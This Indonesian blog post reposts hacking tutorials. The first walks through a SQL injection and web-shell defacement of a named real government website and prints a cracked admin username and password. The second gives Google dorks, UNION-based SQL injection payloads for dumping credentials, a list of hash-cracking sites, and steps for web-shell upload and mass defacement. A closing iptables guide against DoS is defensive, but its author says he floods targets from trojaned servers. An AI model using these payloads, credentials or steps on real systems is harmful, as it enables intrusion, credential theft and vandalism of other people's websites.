Wednesday 27 July 2016

Tutorial lengkap deface website

Apa itu deface?

Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan karena terdapat lubang pada sistem security yang ada di

dalam sebuah aplikasi.

Defacer website dapat merubah tampilan sebagian atau seluruhnya tergantung kemauan defacer dan lubang yang bisa dimasuki, namun jika dia sudah putus asa, defacer akan melakukan denial of servis (DoS) attack yaitu mengirimkan request palsu pada server yang berlebihan sehingga kerja

server lambat dan lama-kelamaan server akan crash dan down.

Itulah deface.

ok langsung saja

peralatan perang yang dibutuhkan

1.acunetix --> download

2.havij pro --> download

3.admin login finder --> download

4.shell backdoor --> download

1.scanning web korban dengan acunetix disini korban saya http://www.vsi.esdm.go.id maaf ya adamin cuman buat pembelajaran

scanning sampai selesai setelah itu muncul hole atau kerentanan web tersebut

hmmm sepertinya disisni saya akan mengeksekusi web tersebut dengan teknik sql injection

klik sql injection lalu pilih parameternya lalu klik dan muncul keterangan di sebelah kanan tampilan acunetix
> lalu launch the attack with http editor 

setelah di klik launch the attack with http editor maka muncul jendela baru

copy path injection
disini path korban saya  /peringatan_dini.php?bulan=9-2+4-2-2&tahun=2012


lalu pastekan pada adress bar mozilla dan copy lagi semuanya pada adress bar
jadinya  vsi.esdm.go.id/peringatan_dini.php?bulan=9-2+4-2-2&tahun=2012 kayaknya ini bener - bener rentan sql injection liat gambar di bawah
artikelnya kosong





sekarang waktunya untuk menyuntikkan sql dengan tool havij yang sudah kalian download tadi
buka toolnya

lalu pastekan url korban yang telah anda copykan tadi pada kotak target lalu analyze


 tunggu sampai scanning selesai dan sukses injection
apabila success injection muncul nama database nya dan tombol table telah di buka




alu klik tombol table dan pilih get tables untuk mendapatkan table sql


lau muncul nama-nama table nya
pilih sekiranya dimana letak admin login databasenya
disini letak admin loginya berada pada table users
lalu centang table users lalu klik GET COLOUMNS


setelah mendapatkan coloumn sekarang kita mencari user dan pass loginya dengan men ceklist username dan passwordnya
lalu klik GET DATA



tunggu .......

lalu muncul duehh user loginya admin

hmmm.... kayaknya ini password masih di enskripsi hash md5
tapi jangan patah semangat coba kita dekript dulu make tool decrypt online atau john the ripper
juga bisa make google database agar pekerjaan kita lebih cepat

disini kita coba decrypt login admin yana soalnya akses levelnya juga admin dan password di google databasenya juga tersedia
kita decrypt 930d35238e22c6bf400a959e470d4949 dengan google database
buka google lalu pastekan hash md5 pada kolom search

lalu google akan mencari pilih salah satu dari temuan google
dan akhrinya berhasil menemukan hash tersebut passwornya adalah merapi jadi loginya user = yana pass = merapi


sekarang password sudah ketemu sekarang yang diakukan adalah mencari halaman ogin web korban dengan tool admin login finder yang telah kalian download tadi buka toolnya dan masukkan alamat url korban pada kolom lalu scan



NAHH . .  sudah ketemu loginya sekarang kita coba masuk sebagai admin
bersiap siaplah
login dengan username & password yang telah kita temukan tadi

dan sukses kita dah masuk sebagai admin



sekarang apa yang kita lakuakan setelah masuk sebagai admin
yups .  . bener sekali tujuan kita disini adalah merubah tampilan depan web
jadi yang kita lakukan adalah menanam shell backdoor pada website korban

apa itu shell backdoor

buat yang suka deface pasti sudah tau tentang Backdoor "pintu belakang" alias jalan pintas buat akses log on situs web, gak cuma itu sih kita juga bisa leluasa kalo mengexploitasi web dengan menggunakan Backdoor ( shell ) tanpa harus login sebagai administrator kita punya kuasa yang sama dengan admin aselinya hehe,

kalau web menggunakan cms joomla bisa baca-baca dulu di -->Upload shell pada joomla
 
kalau web menggunakan cms wordpress bisa di lihat di --> Upload shell pada wordpress


maka kita harus mencari sendiri servis uploadnya
biasanaya terdapat pada upload image 

lets go

disini  letak upoad image nya berada pada static content > header


lalu pilih tambah header dan edit judul dan browse shell backdoor yang telah kalian download tadi

JANGAN LUPA SHELL BACKDOOR DIRUBAH EKSTENSI NYA YANG TADINYA .PHP DIRUBAH MENJADI .JPG

pilih shell.jpg yang telah kalian rubah ekstensinya

setelah selesai memilih shell jangan upload dulu kita install dulu addon tamper data
apa bila belum punya tamper data silahkan download di http://addons.mozilla.org/id/firefox/addon/tamper-data/eula/79565?src=dp-btn-primary


setelah itu install dan buka tamper data pada mozilla tools > tamper data

lalu klik start

lalu segera balik ke halaman upload shell.jpg tadi dan segeralah upload
lalu muncul dialog pada tamper dta klik TAMPER



lalu pada layar jendela tamper popup di sebelah kanan layar post_data cari shell.jpg disini saya menggunakan becak.jpg
lalu cari becak.jpg setelah ketemu rubah ekstensi menjadi .PHP jadinya becak.php

dan sukses di upload shell.php kita
dan sekarang kita mencari letak shellnya untuk di panggil

buka lagi judul yang telah kita buat tadi klik edit

lalu klik kanan pada gambar dan pilih copy image location

setelah di copy paste pada adress bar mozilla jadinya
http://vsi.esdm.go.id/foto_banner/becak.php

dan berhasil kita sudah masuk pada shell backdoor


sekarang kita pergi ke halaman depan web tersebut cari index.php / index.html website



dan rubah source kode pada index.php dengan mengkik edit

hapus semua code dalam index.php rubah dengan source code html kalian atau bisa langsung upload file index.html kalian dan lihat hasinya
sumber : http://trojanzboy.blogspot.co.id/2013/05/tutorial-lengkap-deface-website.html

Deface dengan teknik SQL Injections by 1337cyberindo

sebelumnya makasih sama abang yg udah bikin tutorial ini ane dapetin tutorial ini dari group official 1337cyberindo
[HOT TUTORIAL/ Re POST]
Deface dengan teknik SQL Injections
Level : Basic
Tools : Hackbar & Dorker tools
Kali ini saya akan memberikan tutorial bagian pertama untuk teknik deface dengan method SQL injections level basic
harap disimak baik baik, karena saya menghabiskan waktu sekitar 3 jam utuk membuat tutorial ini,
Tutorial ini khusus untuk 1337cyberindo member, kalau mau share sertakan sumbernya...RESPECT 
berikut langkah langkahnya :
A) CARI TARGET DAN ADMIN PASSWORD
Hal pertama yang akan kita lakuan adalah mencari target dengan menggunakan "Dorks"
saya akan berikan contoh beberapa dork yang saya ambil dari google
Dork :
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
kamu dapat mencarinya dengan kata kunci "Dork SQLi fresh 2016"
Langkah langkah dari perncarian admin:password ini adalah :
1). Check vulnerability atau kerentanan target
oke, kita menemukan target misal seperti ini
disini kita tinggal menambahkan kode ' (quote) dibelakan Url,untuk mengecek apakah target vulnSQLi atau tidak
dan akan menjadi seperti ini
Jika kamu menemukan error seperti :
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
atau semacam error lainnya, bisa dipastikan website tersebut rentan terhadap serangan SQL Injections
2). Mencari Jumlah kolom dalam sebuah database website
Pada tutor kali ini kita menggunakan ORDER BY
bagaimana caranya?
kita tinggal memasukan kata kunci tersebut dibelakang Url ditambahkan nomor sampai mendapatkan pesan error.
Contoh :
http://www.site.com/news.php?id=5 order by 1/* <-- lancar
http://www.site.com/news.php?id=5 order by 2/* <-- lancar
http://www.site.com/news.php?id=5 order by 3/* <-- lancar
http://www.site.com/news.php?id=5 order by 4/* <-- error
(kita mendapatkan pesan erro di kolom '4' dengan kata 'order clause' atau pesan seperti itu)
Itu artinya website terdiri dari 3 kolom / coloumns , karena kita mendapatkan error di kolom 4 , rumus 4 - 1 = 3 .
3). Check fungsi UNION
dengan union kita dapat memilih data dari suatu SQL statement
kita masukan rumus union dengan kode :
http://www.site.com/news.php?id=5 union all select 1,2,3/* (dari langkah 2 kita memiliki 3 kolom , misal vuln di kolom 2 )
http://www.site.com/news.php?id=5 union all select 1,(inject here)2,3/*
NOTE: * jika /* tidak berfungsi atau error, coba dengan --
* kamu tinggal memasukan berapa jumlah kolom dari hasil langkah kedua
4). Mengetahui MySQL version
sebelumnya kita menemukan vuln di kolom 2, mari kita check versi dari mysql nya
kita gantikan kolom 2 dengan @@version or version() dan nanti hasilnya seperti 4.1.33-log atau 5.0.45 or seperti itu pokoknya.
jadinya akan seperti ini http://www.site.com/news.php?id=5 union all select 1,@@version,3/*
disini jika kamu mendapatkan error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."
kita perlu mengkonversi fungsi>>> ()
contoh :
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*
atau dengan hex() atau unhex()
sehingga menjadi
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*
hehe...kamu akan mendapat MySQL version 
5). Melihat Table dan nama kolom
Oke...jika MySQL version nya < 5 (misal versi 4.1.33, 4.1.12...) <--- hal ini berbeda dengan versi MySQL 5
nanti akan kita jelakan di tahapan 5
biasanya kolom tabel ini berinisial: user/s, admin/s, member/s dan lainnya...
atau yang umum dengan nama: username, user, usr, user_name, password, pass, passwd, pwd dan lainnya...
Contoh :
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/*
nah, misalkan disini kita mendapatkan kolom admin di vuln langkah kedua tadi,
selanjutnya kita cari nama admin
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* ( jika kamu mendapatkan error, coba di nama kolom yang lain)
disini website akan menampilkan nama admin, misal admin atau superadmin dan lainnya...
sekarang kita check kolom password nya
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (jika kamu mendapatkan error, coba di nama kolom yang lain)
Kita melihat password di layar website dalam hast atau plain-text,itu tergantung dari bagaimana databasenya diatur
misal md5 hash, mysql hash, sha1, dll...
kita lanjutkan dengan menambahkan query , untuk itu kita menggunakan fungsi concat()
contoh :
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Kenapa menggunakan 0x3a? itu nilai hex untuk kolom
atau kita menggunakan char(58), ascii
contoh :
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
di layar, website akan menampilkan username:password , contoh, admin:admin atau admin:hash
jika kamu mendapatkan itu, kamu akan login seperti admin atau superadmin untuk hak akses website tersebut.
jika kamu tidak mendapatkannya, secara default kamu akan mendapatkan hak user
contoh:
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*
6). MySQL 5
seperti yang saya katakan sebelumnya, kita akan menjelaskan bagaimana mencari table dan kolom di MySQL > 5.
untuk bagian ini kita membutuhkan information_schema. itu akan memunculkan semua tables dan columns dalam sebuah database.
untuk mengambil tables kita gunakan table_name dan information_schema.tables.
contoh :
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*
disini kita mengganti kolom 2 yang vuln dengan table_name untuk mengambil table dari information_schema.tables
sekarang kita harus memasukan perintah LIMIT di akhir query untuk menampilkan semua table di database
contoh :
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
disini saya memasukan limit 0,1 itu untuk mengambil result 1 yang dimulai dari 0
sekarang untuk melihat table kedua, kita ganti limit 0,1 menjadi limit 1,1
contoh :
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
disini table kedua akan ditampilkan di layar website.
untuk table ketiga kita memasukan limit 2,1
contoh :
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*
begitu seterusnya sebelum kamu menemukan nama seperti db_admin, poll_user, auth, auth_user dll
untuk mengambil nama column, kita gunakan methode yang sama
disini kita gunakan column_name dan information_schema.columns
dengan methode yang sama ini, contohnya menjadi :
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
disini kolom pertama akan ditampilkan di website
unntuk kolom kedua (kita ganti limit 0,1 menjadi limit 1,1)
contoh :
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*
kolom kedua akan ditampilkan, lanjutkan seterusnya langkah tersebut yampai kamu mendapatkan kolom dengan nama seperti
username,user,login, password, pass, passwd dll
jika kamu menginginkan untuk menampilkan spesipik table gunakan query ini
misal kita ingin menemukan spesifik nama kolom untuk " user's"
contohnya :
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
sekarang kita bisa menamplkan nama kolom dari table user,
hanya dengan menggunakan LIMIT kita dapat menampilkan semua kolom dalam table user's
sekarang bagaimana cara menemukan colums user, pass dan email ?
untuk hal itu kita gunakan concat()
contohnya :
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email) from users/*
kita dapatkan disini user:pass:email from table users.
misal: admin:hash:mamahmuda@ngemil.com
Selanjutnya kamu dapat meng crack hash dari password tersebut di :
1-http://www.milw0rm.com
2-http://www.gdataonline.com
3-http://www.hashkiller.com
4-http://www.csthis.com
5-http://www.crysm.net
6-http://www.rednoize.com
7-http://www.md5decrypter.com
8-http://www.hashreverse.com
9-http://www.cryptobitch.de
10-http://www.hashchecker.com
11-http://www.securitystats.com
12-http://www.neeao.com
13-http://www.xpzone.de
14-http://gdataonline.com
15-http://md5.rednoize.com
16-http://md5cracker.org/
17-http://www.cmd5.com/english.aspx (457,354,352,282)
18-http://www.md5crack.com
19-http://www.hashchecker.com
20http://md5cracker(.)tk/ (MD5 Search engine by searches a total of 14 on-line crackers.)
21-http://www.md5decrypter.com (5,889,729)
22-http://www.md5oogle.com
23-http://md5-db.com (The database is approximately 70gb)
24-http://md5.rednoize.com (56,502,235)
25-http://gdataonline.com/seekhash.php (3,251,106)
26-http://www.tmto.org/?category=main&page=search_md5(306.000.000.000)
27-http://www.milw0rm.com/cracker/insert.php (Milw0rm Cracker db)
28-http://blacklight.got(hilangkan tanda kurung dns)(dot)org/cracker/crack.php (2,456,288)
29-http://www.****************l-storm.org/md5 ( The data base currently contains 169582 passwords )
30-http://md5.xpzone.de (Need Account)
31-http://passcracking.com/ (Register to increase your priority)
32-http://www.xmd5.org
33-http://gdataonline.com/seekhash.php
34-http://passcracking.com/
35-http://www.1hacker.com/md5/index.php
36-http://www.gdataonline.com/seekhash.php
37-http://www.rc.plain-text.info/
38-http://www.milw0rm.com/md5/index.php
39-http://www.cracking.com/Good_values_list.asp
40-http://www.passcracking.com/Good_values_list.asp
41-http://www.hashchecker.com/index.php?_sls=info
42-http://www.cmho(.)tk/
43-http://www.md5.rednoize.com/
44-http://www.us.md5.crysm.net/
45-http://www.milw0rm.com
46-http://www.passcracking.com/
47-http://www.hashchecker.com/
48-http://www.plain-text.info
49-http://www.md5.rednoize.com
50-http://www.ice.breaker.free.fr
51-http://www.md5.shalla.de
52-http://www.nz.md5.crysm.net
53-http://www.shm.hard-core.pl/md5/
54-http://cracker.offensive-security.com/
55-http://bokehman.com/cracker/
56-http://www.md5this.com/
57-http://hashcrack.com/index.php
58-http://tools.benramsey.com/md5/
59-http://en.wikipedia.org/wiki/MD5
60-http://md5.noisette.ch/
B) DEFACING WEBSITE
Setelah kamu mendapatkan admin:password:dan email , kamu dapat login sebagai admin website tersebut , tapi bagaimana caranya ?
ikuti langkah ini :
1) Menggunakan tools GAZA Url Scanner
Tools dapat di download di
https://www.facebook.com/gr…/1337CyberIndo/821674711300500/…
2) Upload Shell
Setelah kamu menemukan halaman login dan logging sebagai admin,sekarang waktunya upload shell lewat file manager,berikan hak akses chmod 777 .kamu bisa menggunakan shell berikut uploader nya di file group 1337cyberindo
3) Setelah shell 1337cyberindo ter upload kamu tinggal klik " mass deface " otomatis akan mendeface dengan script yang sudah tertanam didalamya atau kamu bisa upload script kamu sendiri
Demikian tutorial Deface dengan methode SQL Injections, nantikan tutorial SQLi lainnya dengan level berbeda
Regard's
Luciffer
makasih abnag atas tutorialnya 

DOS/DDOS Protections by 1337CyberINdo

terimakasih sama temen ane yg mau shere ilmunya ane dpet ilmunya dari group official 1337CyberIndo

[HOT TUTORIAL]
DOS/DDOS Protections
Level : Networking
Selamat wayah kieu buat teman teman.
Kali ini saya akan sedikit menjelaskan mengenai cara memproteksi komputer/server kita dari serangan DOS/DDOS.
Apa itu DOS (Denial of Service) atau DDOS ( Distributed Denial of Service) ? Kalian bisa komentar di bawah
Untuk menghabiskan resource layanan dari sebuah server, serangan DOS/DDOS memanfaatkan berbagai macam cara, misal
* Menghabiskan bandwith yang ada
* Mengirimkan permintaan layanan yang banyak
* serangan paket SYN
* Serangan paket ICMP
* Serangan peer to peer
* Permanen DOS
* Menyerang kelemahan aplikasi
teknik teknik diatas mari kita diskusikan pemahamannya di komentar !
Oke, teknik serangan DOS/DDOS yang biasa saya lakukan adalah teknik Spoofing server, dimana server/vps yang saya punya, ditanami sebuah program Trojan jahat, dimana si attacker bisa mengendalikan trojan ini dan memerintahkan untuk memuntahkan paket data ke target tujuan ( pict 1). disini kita sebut serangan DOS/DDOS ini dengan nama Flooding, dan orangnya disebut Flooder.
Sangat tidak nyaman ketika kita enak enak surfing di internet, koneksi menjadi RTO (Run Time Error) atau koneksi terputus, dikarenakan ada serangan ini. video contoh serangan ini bisa dilihat dihttps://www.youtube.com/watch?v=TQazPmzBU_I itu contoh cara memutuskan koneksi target ketika sedang online
Nah disini kita tidak akan membahas mengenai teknik DOS/DDOS tersebut, kita akan membahas tentang bagaimana mengantisipasi serangan tersebut (DOS/DDOS Protections). untuk pencegahan..disini kita gunakan linux, ok..langkah langkahnnya :
1. Kita menggunakan ip tables untuk proteksi pertama, cara penginstallannya :
‪#‎apt‬-get install iptables
2. selanjutnya kita atur konfigurasi untuk memblok paket data tidak wajar yang masuk berdasarkan hitungan waktu, printahnya :
‪#‎iptables‬ -A INPUT -p udp -m udp --dport X -m state --state NEW -m recent --set --name DEFAULT --rsource
# iptables -A INPUT -p udp -m udp --dport X -m state --state NEW -m recent --update --seconds 1 --hitcount Y --name DEFAULT --rsource -j REJECT
3. selanjutnya kita control koneksi
#iptables -A INPUT -p tcp --syn -m limit --limit 1 /s --limit-burst X -j DROP
4. kamu juga dapat mengatur pemblokiran terhadap port yang tidak kamu inginkan, perintahnya :
#IPTABLES -A INPUT -p tcp -m multiport --dports 135,137,138,139,445,1433,1434 -j DROP
#IPTABLES -A INPUT -p udp -m multiport --dports 135,137,138,139,445,1433,1434 -j DROP
5. selanjutnya untuk melihat semua lalu lintas paket data yang masuk dan keluar ke jaringan kita,bisa menggunakan perintah
#iptables -L -n
Selanjutnya anda bisa menonaktifkan semua serangan flooding SYN / SSYN, dengan menetapkan TCP-Syn Cookie untuk setiap koneksi. Untuk melakukannya, silahkan edit / proc / sys / net / ipv4 / tcp_syncookies, kita gunakan perintah :
‪#‎echo‬ 1 > /proc/sys/net/ipv4/tcp_syncookies
Juga merupakan ide yang baik untuk mengabaikan semua request/ permintaan yang mesuk melalui ICMP , gunakan perintah:
#echo 0 > /proc/sys/net/ipv4/icmp_echo_ignore_all
Selahanya perlu sedikit pengaktifan. Saya akan melakukan ini di bash, perintahnya :
#!/bin/bash
for i in /proc/sys/net/ipv4/conf/*/rp_filter; do echo 1 > $i; done
Terakhir Anda harus membuat server Anda tidak menerima atau mengirim ulang ICMP redirect, kita gunakan script bash juga untuk pengaktifannya :
#!/bin/bash
for i in /proc/sys/net/ipv4/conf/*/accept_redirects; do echo 0 > $i; done
for i in /proc/sys/net/ipv4/conf/*/send_redirects; do echo 0 > $i; done
Oke demikian cara proteksi dari serangan DOS/DDOS atau Flooding dengan menggunakan konfigurasi Ip Tables dan lainnya
Semoga membantu , silahkan share di web/blog anda dengan menyertakan link tutorial ini...Respect .
Regard's
Luciffer

makasih abang atas tutorialnya !!!!!